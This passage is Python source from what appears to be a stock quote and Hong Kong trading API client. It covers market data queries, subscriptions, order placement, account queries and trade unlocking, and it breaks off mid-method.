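# candles for one stock. Dates use the '%Y-%m-%d' format described above; the
# stock code and date range are illustrative only.
#
#   ret, df = quote_ctx.get_history_kline('HK.00700', start='2017-06-20',
#                                         end='2017-06-22', ktype='K_DAY')
#   if ret == RET_OK:
#       print(df[['time_key', 'open', 'close', 'volume']])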
def get_autype_list(self, code_list):
"""get the autype list"""
if code_list is None or isinstance(code_list, list) is False:
error_str = ERROR_STR_PREFIX + "the type of code_list param is wrong"
return RET_ERROR, error_str
for code in code_list:
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of param in code_list is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(ExrightQuery.pack_req,
ExrightQuery.unpack_rsp)
kargs = {"stock_list": code_list}
ret_code, msg, exr_record = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code',
'ex_div_date',
'split_ratio',
'per_cash_div',
'per_share_div_ratio',
'per_share_trans_ratio',
'allotment_ratio',
'allotment_price',
'stk_spo_ratio',
'stk_spo_price',
'forward_adj_factorA',
'forward_adj_factorB',
'backward_adj_factorA',
'backward_adj_factorB']
exr_frame_table = pd.DataFrame(exr_record, columns=col_list)
return RET_OK, exr_frame_table
def get_market_snapshot(self, code_list):
"""get teh market snapshot"""
code_list = unique_and_normalize_list(code_list)
if not code_list:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(MarketSnapshotQuery.pack_req,
MarketSnapshotQuery.unpack_rsp)
kargs = {"stock_list": code_list}
ret_code, msg, snapshot_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'update_time', 'last_price', 'open_price',
'high_price', 'low_price', 'prev_close_price',
'volume', 'turnover', 'turnover_rate', 'suspension', 'listing_date',
'circular_market_val', 'total_market_val', 'wrt_valid',
'wrt_conversion_ratio', 'wrt_type', 'wrt_strike_price',
'wrt_maturity_date', 'wrt_end_trade', 'wrt_code',
'wrt_recovery_price', 'wrt_street_vol', 'wrt_issue_vol',
'wrt_street_ratio', 'wrt_delta', 'wrt_implied_volatility', 'wrt_premium', 'lot_size',
# 2017.11.6 add
'issued_shares', 'net_asset', 'net_profit', 'earning_per_share',
'outstanding_shares', 'net_asset_per_share', 'ey_ratio', 'pe_ratio', 'pb_ratio',
# 2017.1.25 add
'price_spread',
]
snapshot_frame_table = pd.DataFrame(snapshot_list, columns=col_list)
return RET_OK, snapshot_frame_table
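# Hedged usage sketch (not part of the original source): snapshot for a small
# code list. The column names come from col_list above; the codes are
# illustrative only.
#
#   ret, snap = quote_ctx.get_market_snapshot(['HK.00700', 'US.AAPL'])
#   if ret == RET_OK:
#       print(snap[['code', 'last_price', 'volume', 'turnover_rate']])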
def get_rt_data(self, code):
"""get real-time data"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of param in code is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(RtDataQuery.pack_req,
RtDataQuery.unpack_rsp)
kargs = {"stock_str": code}
ret_code, msg, rt_data_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'time', 'data_status', 'opened_mins', 'cur_price', 'last_close',
'avg_price', 'volume', 'turnover']
rt_data_table = pd.DataFrame(rt_data_list, columns=col_list)
return RET_OK, rt_data_table
def get_plate_list(self, market, plate_class):
"""get stock list of the given plate"""
param_table = {'market': market, 'plate_class': plate_class}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
if market not in MKT_MAP:
error_str = ERROR_STR_PREFIX + "the value of market param is wrong "
return RET_ERROR, error_str
if plate_class not in PLATE_CLASS_MAP:
error_str = ERROR_STR_PREFIX + "the class of plate is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SubplateQuery.pack_req,
SubplateQuery.unpack_rsp)
kargs = {'market': market, 'plate_class': plate_class}
ret_code, msg, subplate_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'plate_name', 'plate_id']
subplate_frame_table = pd.DataFrame(subplate_list, columns=col_list)
return RET_OK, subplate_frame_table
def get_plate_stock(self, plate_code):
"""get the stock of the given plate"""
if plate_code is None or is_str(plate_code) is False:
error_str = ERROR_STR_PREFIX + "the type of stock_code is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(PlateStockQuery.pack_req,
PlateStockQuery.unpack_rsp)
kargs = {"plate_code": plate_code}
ret_code, msg, plate_stock_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'lot_size', 'stock_name', 'owner_market', 'stock_child_type', 'stock_type']
plate_stock_table = pd.DataFrame(plate_stock_list, columns=col_list)
return RET_OK, plate_stock_table
def get_broker_queue(self, code):
"""get teh queue of the broker"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of param in code is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(BrokerQueueQuery.pack_req,
BrokerQueueQuery.unpack_rsp)
kargs = {"stock_str": code}
ret_code, bid_list, ask_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, ERROR_STR_PREFIX, EMPTY_STRING
col_bid_list = ['code', 'bid_broker_id', 'bid_broker_name', 'bid_broker_pos']
col_ask_list = ['code', 'ask_broker_id', 'ask_broker_name', 'ask_broker_pos']
bid_frame_table = pd.DataFrame(bid_list, columns=col_bid_list)
        ask_frame_table = pd.DataFrame(ask_list, columns=col_ask_list)
        return RET_OK, bid_frame_table, ask_frame_table
def subscribe(self, stock_code, data_type, push=False):
"""
subscribe a sort of data for a stock
:param stock_code: string stock_code . For instance, "HK.00700", "US.AAPL"
:param data_type: string data type. For instance, "K_1M", "K_MON"
:param push: push option
:return: (ret_code, ret_data). ret_code: RET_OK or RET_ERROR.
"""
param_table = {'stock_code': stock_code, 'data_type': data_type}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SubscriptionQuery.pack_subscribe_req,
SubscriptionQuery.unpack_subscribe_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'stock_str': stock_code, 'data_type': data_type}
ret_code, msg, _ = query_processor(**kargs)
# update subscribe context info
sub_obj = (str(stock_code), str(data_type), bool(push))
self._ctx_subscribe.add(sub_obj)
if ret_code != RET_OK:
return RET_ERROR, msg
if push:
ret_code, msg, push_req_str = SubscriptionQuery.pack_push_req(stock_code, data_type)
if ret_code != RET_OK:
return RET_ERROR, msg
ret_code, msg = self._send_async_req(push_req_str)
if ret_code != RET_OK:
return RET_ERROR, msg
return RET_OK, None
def unsubscribe(self, stock_code, data_type, unpush=True):
"""
        unsubscribe a sort of data for a stock
:param stock_code: string stock_code . For instance, "HK.00700", "US.AAPL"
:param data_type: string data type. For instance, "K_1M", "K_MON"
:param unpush: bool
:return: (ret_code, ret_data). ret_code: RET_OK or RET_ERROR.
"""
param_table = {'stock_code': stock_code, 'data_type': data_type}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SubscriptionQuery.pack_unsubscribe_req,
SubscriptionQuery.unpack_unsubscribe_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'stock_str': stock_code, 'data_type': data_type}
# update subscribe context info
unsub_obj1 = (str(stock_code), str(data_type), True)
unsub_obj2 = (str(stock_code), str(data_type), False)
if unsub_obj1 in self._ctx_subscribe:
self._ctx_subscribe.remove(unsub_obj1)
if unsub_obj2 in self._ctx_subscribe:
self._ctx_subscribe.remove(unsub_obj2)
ret_code, msg, _ = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
if unpush:
ret_code, msg, unpush_req_str = SubscriptionQuery.pack_unpush_req(stock_code, data_type)
if ret_code != RET_OK:
return RET_ERROR, msg
ret_code, msg = self._send_async_req(unpush_req_str)
if ret_code != RET_OK:
return RET_ERROR, msg
return RET_OK, None
def query_subscription(self, query=0):
"""
get the current subscription table
:return:
"""
query_processor = self._get_sync_query_processor(SubscriptionQuery.pack_subscription_query_req,
SubscriptionQuery.unpack_subscription_query_rsp)
kargs = {"query": query}
ret_code, msg, subscription_table = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
return RET_OK, subscription_table
def get_stock_quote(self, code_list):
"""
:param code_list:
:return: DataFrame of quote data
Usage:
After subcribe "QUOTE" type for given stock codes, invoke
get_stock_quote to obtain the data
"""
code_list = unique_and_normalize_list(code_list)
if not code_list:
error_str = ERROR_STR_PREFIX + "the type of code_list param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(StockQuoteQuery.pack_req,
StockQuoteQuery.unpack_rsp,
)
kargs = {"stock_list": code_list}
ret_code, msg, quote_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'data_date', 'data_time', 'last_price', 'open_price',
'high_price', 'low_price', 'prev_close_price',
'volume', 'turnover', 'turnover_rate', 'amplitude', 'suspension', 'listing_date', 'price_spread'
]
quote_frame_table = pd.DataFrame(quote_list, columns=col_list)
return RET_OK, quote_frame_table
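    # Hedged usage sketch (not part of the original source): the quote methods above are meant
    # to be called on a quote context after subscribing to the matching data type, as the
    # get_stock_quote docstring describes. Assuming an instance named `quote_ctx` (name is
    # illustrative only):
    #
    #     ret, msg = quote_ctx.subscribe('HK.00700', 'QUOTE')    # 'HK.00700' as in the docstrings
    #     if ret == RET_OK:
    #         ret, quotes = quote_ctx.get_stock_quote(['HK.00700'])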
def get_rt_ticker(self, code, num=500):
"""
get transaction information
:param code: stock code
:param num: the default is 500
:return: (ret_ok, ticker_frame_table)
"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
if num is None or isinstance(num, int) is False:
error_str = ERROR_STR_PREFIX + "the type of num param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(TickerQuery.pack_req,
TickerQuery.unpack_rsp,
)
kargs = {"stock_str": code, "num": num}
ret_code, msg, ticker_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'time', 'price', 'volume', 'turnover', "ticker_direction", 'sequence']
ticker_frame_table = pd.DataFrame(ticker_list, columns=col_list)
return RET_OK, ticker_frame_table
def get_cur_kline(self, code, num, ktype='K_DAY', autype='qfq'):
"""
get current kline
:param code: stock code
        :param num: the number of klines to return
        :param ktype: the type of kline
        :param autype: price adjustment type, e.g. 'qfq'
        :return: (ret_code, kline_frame_table)
"""
param_table = {'code': code, 'ktype': ktype}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
if num is None or isinstance(num, int) is False:
error_str = ERROR_STR_PREFIX + "the type of num param is wrong"
return RET_ERROR, error_str
if autype is not None and is_str(autype) is False:
error_str = ERROR_STR_PREFIX + "the type of autype param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(CurKlineQuery.pack_req,
CurKlineQuery.unpack_rsp,
)
kargs = {"stock_str": code, "num": num, "ktype": ktype, "autype": autype}
ret_code, msg, kline_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'time_key', 'open', 'close', 'high', 'low', 'volume', 'turnover', 'pe_ratio', 'turnover_rate']
kline_frame_table = pd.DataFrame(kline_list, columns=col_list)
return RET_OK, kline_frame_table
def get_order_book(self, code):
"""get the order book data"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(OrderBookQuery.pack_req,
OrderBookQuery.unpack_rsp,
)
kargs = {"stock_str": code}
ret_code, msg, orderbook = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
return RET_OK, orderbook
def get_suspension_info(self, codes, start='', end=''):
        '''
        Query the suspension dates of the given stock(s) within a time range.
        :param codes: stock code(s)
        :param start: start date, '%Y-%m-%d'
        :param end: end date, '%Y-%m-%d'
        :return: (ret, data). When ret == 0, data is a pd DataFrame with columns 'code' and
                 'suspension_dates' (several dates joined into one comma-separated string);
                 when ret != 0, data is an error string.
        '''
req_codes = unique_and_normalize_list(codes)
if not codes:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SuspensionQuery.pack_req,
SuspensionQuery.unpack_rsp,
)
kargs = {"codes": req_codes, "start": str(start), "end": str(end)}
ret_code, msg, susp_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'suspension_dates']
pd_frame = pd.DataFrame(susp_list, columns=col_list)
return RET_OK, pd_frame
def get_multi_points_history_kline(self, codes, dates, fields, ktype='K_DAY', autype='qfq', no_data_mode=KL_NO_DATA_MODE_FORWARD):
        '''
        Get the specified data fields of multiple stocks at multiple time points.
        :param codes: one or more stock codes, 'HK.00700' or ['HK.00700', 'HK.00001']
        :param dates: one or more dates, '2017-01-01' or ['2017-01-01', '2017-01-02']
        :param fields: one or more data fields, KL_FIELD.ALL or [KL_FIELD.DATE_TIME, KL_FIELD.OPEN]
        :param ktype: kline type
        :param autype: price adjustment type
        :param no_data_mode: how to fill the kline value when the requested date is a non-trading day
        :return: pd DataFrame whose columns depend on the requested fields; the fixed columns are
                 'code' (stock code), 'time_point' (the requested date) and 'data_valid'
                 (0 = no data, 1 = data exists at the requested point, 2 = no data at the requested
                 point, the previous point is used)
        '''
req_codes = unique_and_normalize_list(codes)
if not codes:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
req_dates = unique_and_normalize_list(dates)
if not dates:
error_str = ERROR_STR_PREFIX + "the type of dates param is wrong"
return RET_ERROR, error_str
req_fields = unique_and_normalize_list(fields)
if not fields:
req_fields = copy(KL_FIELD.ALL_REAL)
req_fields = KL_FIELD.normalize_field_list(req_fields)
if not req_fields:
error_str = ERROR_STR_PREFIX + "the type of fields param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(MultiPointsHisKLine.pack_req,
MultiPointsHisKLine.unpack_rsp)
all_num = max(1, len(req_dates) * len(req_codes))
one_num = max(1, len(req_dates))
max_data_num = 500
max_kl_num = all_num if all_num <= max_data_num else int(max_data_num / one_num) * one_num
if 0 == max_kl_num:
error_str = ERROR_STR_PREFIX + "too much data to req"
return RET_ERROR, error_str
data_finish = False
list_ret = []
        # request the data in a loop to avoid timeouts from fetching too much at once
while not data_finish:
print('get_multi_points_history_kline - wait ... %s' % datetime.now())
kargs = {"codes": req_codes, "dates": req_dates, "fields": req_fields, "ktype": ktype, "autype": autype, "max_num": max_kl_num, "no_data_mode":no_data_mode}
ret_code, msg, content = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
list_kline, has_next = content
data_finish = (not has_next)
for dict_item in list_kline:
item_code = dict_item['code']
if has_next and item_code in req_codes:
req_codes.remove(item_code)
list_ret.append(dict_item)
if 0 == len(req_codes):
data_finish = True
        # header columns
col_list = ['code', 'time_point', 'data_valid']
for field in req_fields:
str_field = KL_FIELD.DICT_KL_FIELD_STR[field]
if str_field not in col_list:
col_list.append(str_field)
pd_frame = pd.DataFrame(list_ret, columns=col_list)
return RET_OK, pd_frame
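    # Hedged usage sketch (not part of the original source), based on the docstring above.
    # Assuming an instance named `quote_ctx` (name is illustrative only):
    #
    #     ret, frame = quote_ctx.get_multi_points_history_kline(
    #         ['HK.00700', 'HK.00001'],          # codes, as in the docstring example
    #         ['2017-01-01', '2017-01-02'],      # dates
    #         KL_FIELD.ALL,                      # fields
    #         ktype='K_DAY', autype='qfq')
    #
    # The 'data_valid' column of the returned frame tells how each requested point was filled.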
class SafeTradeSubscribeList:
    """Thread-safe container of (orderid, envtype) pairs subscribed for order/deal push."""
def __init__(self):
self._list_sub = []
self._lock = RLock()
def add_val(self, orderid, envtype):
self._lock.acquire()
self._list_sub.append((str(orderid), int(envtype)))
self._lock.release()
def has_val(self, orderid, envtype):
ret_val = False
self._lock.acquire()
if (str(orderid), int(envtype)) in self._list_sub:
ret_val = True
self._lock.release()
return ret_val
def del_val(self, orderid, envtype):
self._lock.acquire()
key = (str(orderid), int(envtype))
if key in self._list_sub:
self._list_sub.remove(key)
self._lock.release()
def copy(self):
list_ret = None
self._lock.acquire()
list_ret = [i for i in self._list_sub]
self._lock.release()
return list_ret
class OpenHKTradeContext(OpenContextBase):
"""Class for set context of HK stock trade"""
cookie = 100000
def __init__(self, host="127.0.0.1", port=11111):
self._ctx_unlock = None
self._obj_order_sub = SafeTradeSubscribeList()
super(OpenHKTradeContext, self).__init__(host, port, True, True)
self.set_pre_handler(HKTradeOrderPreHandler(self))
def close(self):
"""
        close the old object before creating a new one in a loop, otherwise the socket may hit error 10053 or similar!
"""
super(OpenHKTradeContext, self).close()
def on_api_socket_reconnected(self):
"""for API socket reconnected"""
# auto unlock
if self._ctx_unlock is not None:
for i in range(3):
password, password_md5 = self._ctx_unlock
ret, data = self.unlock_trade(password, password_md5)
if ret == RET_OK:
break
sleep(1)
# auto subscribe order deal push
list_sub = self._obj_order_sub.copy()
dic_order = {}
list_zero_order_env = []
for (orderid, envtype) in list_sub:
if str(orderid) == u'':
list_zero_order_env.append(envtype)
continue
if envtype not in dic_order:
dic_order[envtype] = []
dic_order[envtype].append(orderid)
for envtype in dic_order:
self._subscribe_order_deal_push(dic_order[envtype], True, True, envtype)
        # use a blank orderid to subscribe to all orders
for envtype in list_zero_order_env:
self._subscribe_order_deal_push([], True, False, envtype)
def on_trade_order_check(self, orderid, envtype, status):
'''multi thread notify order finish after subscribe order push'''
if is_HKTrade_order_status_finish(status):
self._obj_order_sub.del_val(orderid=orderid, envtype=envtype)
elif (not self._obj_order_sub.has_val(orderid, envtype)) and self._obj_order_sub.has_val(u'', envtype):
            self._obj_order_sub.add_val(orderid, envtype)  # record info for the blank-orderid subscription
def _subscribe_order_deal_push(self, orderid_list, order_deal_push=True, push_atonce=True, envtype=0):
"""subscribe order for recv push data"""
for orderid in orderid_list:
if order_deal_push is False:
self._obj_order_sub.del_val(orderid, envtype)
else:
self._obj_order_sub.add_val(orderid, envtype)
ret_code, _, push_req_str = TradePushQuery.hk_pack_subscribe_req(
str(self.cookie), str(envtype), orderid_list, str(int(order_deal_push)), str(int(push_atonce)))
if ret_code == RET_OK:
ret_code, _ = self._send_async_req(push_req_str)
return ret_code
def unlock_trade(self, password, password_md5=None):
        '''
        Unlock trading. For security, every trade API can only be used after a successful unlock.
        :param password: plain-text password string (either this or password_md5)
        :param password_md5: md5 string of the password (either this or password)
        :return: (ret, data). When ret == 0, data is None;
                 when ret != 0, data is an error string.
        '''
query_processor = self._get_sync_query_processor(UnlockTrade.pack_req,
UnlockTrade.unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'password': str(password) if password else '',
'password_md5': str(password_md5) if password_md5 else ''}
ret_code, msg, unlock_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# reconnected to auto unlock
if RET_OK == ret_code:
self._ctx_unlock = (password, password_md5)
# unlock push socket
ret_code, msg, push_req_str = UnlockTrade.pack_req(**kargs)
if ret_code == RET_OK:
self._send_async_req(push_req_str)
return RET_OK, None
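    # Hedged usage sketch (not part of the original source): per the docstring above, every trade
    # API requires a successful unlock first. Assuming an instance named `trade_ctx` and a
    # placeholder password (both illustrative only):
    #
    #     ret, data = trade_ctx.unlock_trade('123456')     # or unlock_trade(None, password_md5=...)
    #     if ret == RET_OK:
    #         ret, orders = trade_ctx.order_list_query(envtype=0)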
def subscribe_order_deal_push(self, orderid_list, order_deal_push=True, envtype=0):
"""
subscribe_order_deal_push
"""
if not TRADE.check_envtype_hk(envtype):
return RET_ERROR
list_sub = [u'']
if orderid_list is None:
list_sub = [u'']
elif isinstance(orderid_list, list):
list_sub = [str(x) for x in orderid_list]
else:
list_sub = [str(orderid_list)]
return self._subscribe_order_deal_push(list_sub, order_deal_push, True, envtype)
def place_order(self, price, qty, strcode, orderside, ordertype=0, envtype=0, order_deal_push=False):
"""
place order
use set_handle(HKTradeOrderHandlerBase) to recv order push !
"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
error_str = content
return RET_ERROR, error_str, None
market_code, stock_code = content
if int(market_code) != 1:
error_str = ERROR_STR_PREFIX + "the type of stocks is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(PlaceOrder.hk_pack_req,
PlaceOrder.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'orderside': str(orderside),
'ordertype': str(ordertype), 'price': str(price), 'qty': str(qty), 'strcode': str(stock_code)}
ret_code, msg, place_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# handle order push
self._subscribe_order_deal_push(orderid_list=[place_order_list[0]['orderid']],
order_deal_push=order_deal_push, envtype=envtype)
col_list = ["envtype", "orderid", "code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"order_type", "order_side", "price", "status", "submited_time", "updated_time"]
place_order_table = pd.DataFrame(place_order_list, columns=col_list)
return RET_OK, place_order_table
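    # Hedged usage sketch (not part of the original source). The numeric orderside/ordertype codes
    # below are assumptions to be checked against the trade constants; only the call shape follows
    # the signature above:
    #
    #     ret, order_frame = trade_ctx.place_order(
    #         price=100.0, qty=100, strcode='HK.00700',
    #         orderside=0,        # assumed: 0 = buy (verify against the trade constants)
    #         envtype=0)
    #
    # On success the returned DataFrame includes the new 'orderid'.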
def set_order_status(self, status, orderid=0, envtype=0):
"""for setting the status of order"""
if int(status) not in TRADE.REV_ORDER_STATUS:
error_str = ERROR_STR_PREFIX + "the type of status is wrong "
return RET_ERROR, error_str
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SetOrderStatus.hk_pack_req,
SetOrderStatus.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'status': str(status)}
ret_code, msg, set_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
set_order_table = pd.DataFrame(set_order_list, columns=col_list)
return RET_OK, set_order_table
def change_order(self, price, qty, orderid=0, envtype=0):
"""for changing the order"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(ChangeOrder.hk_pack_req,
ChangeOrder.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'price': str(price), 'qty': str(qty)}
ret_code, msg, change_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
change_order_table = pd.DataFrame(change_order_list, columns=col_list)
return RET_OK, change_order_table
def accinfo_query(self, envtype=0):
"""
query account information
        :param envtype: trading environment parameter, 0 means real trading and 1 means simulation trading
        :return: (RET_ERROR, msg) on error, (RET_OK, ret) on success
"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(AccInfoQuery.hk_pack_req,
AccInfoQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, accinfo_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['Power', 'ZCJZ', 'ZQSZ', 'XJJY', 'KQXJ', 'DJZJ', 'ZSJE', 'ZGJDE', 'YYJDE', 'GPBZJ']
accinfo_frame_table = pd.DataFrame(accinfo_list, columns=col_list)
return RET_OK, accinfo_frame_table
def order_list_query(self, orderid="", statusfilter="", strcode='', start='', end='', envtype=0):
"""for querying the order list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(OrderListQuery.hk_pack_req,
OrderListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'orderid': str(orderid),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def position_list_query(self, strcode='', stocktype='', pl_ratio_min='',
pl_ratio_max='', envtype=0):
"""for querying the position list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(PositionListQuery.hk_pack_req,
PositionListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'stocktype': str(stocktype),
'pl_ratio_min': str(pl_ratio_min),
'pl_ratio_max': str(pl_ratio_max),
'envtype': str(envtype)}
ret_code, msg, position_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "qty", "can_sell_qty", "cost_price",
"cost_price_valid", "market_val", "nominal_price", "pl_ratio",
"pl_ratio_valid", "pl_val", "pl_val_valid", "today_buy_qty",
"today_buy_val", "today_pl_val", "today_sell_qty", "today_sell_val"]
position_list_table = pd.DataFrame(position_list, columns=col_list)
return RET_OK, position_list_table
def deal_list_query(self, envtype=0):
"""for querying deal list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(DealListQuery.hk_pack_req,
DealListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# "orderside" 保留是为了兼容旧版本, 对外文档统一为"order_side"
col_list = ["code", "stock_name", "dealid", "orderid",
"qty", "price", "orderside", "time", "order_side"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
def history_order_list_query(self, statusfilter='', strcode='', start='', end='', envtype=0):
"""for querying the order list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryOrderListQuery.hk_pack_req,
HistoryOrderListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def history_deal_list_query(self, strcode, start, end, envtype=0):
"""for querying deal list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryDealListQuery.hk_pack_req,
HistoryDealListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealid", "orderid", "qty", "price",
"order_side", "time", "contra_broker_id", "contra_broker_name"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
def login_new_account(self, user_id, login_password_md5, trade_password, trade_password_md5=None):
        '''
        Automatically log in to a new Futu (NiuNiu) account.
        :param user_id: Futu account id
        :param login_password_md5: md5 of the new account's login password
        :param trade_password: the new account's trade password
        :param trade_password_md5: md5 of the new account's trade password (either this or trade_password)
        :return:
        '''
query_processor = self._get_sync_query_processor(LoginNewAccountQuery.pack_req,
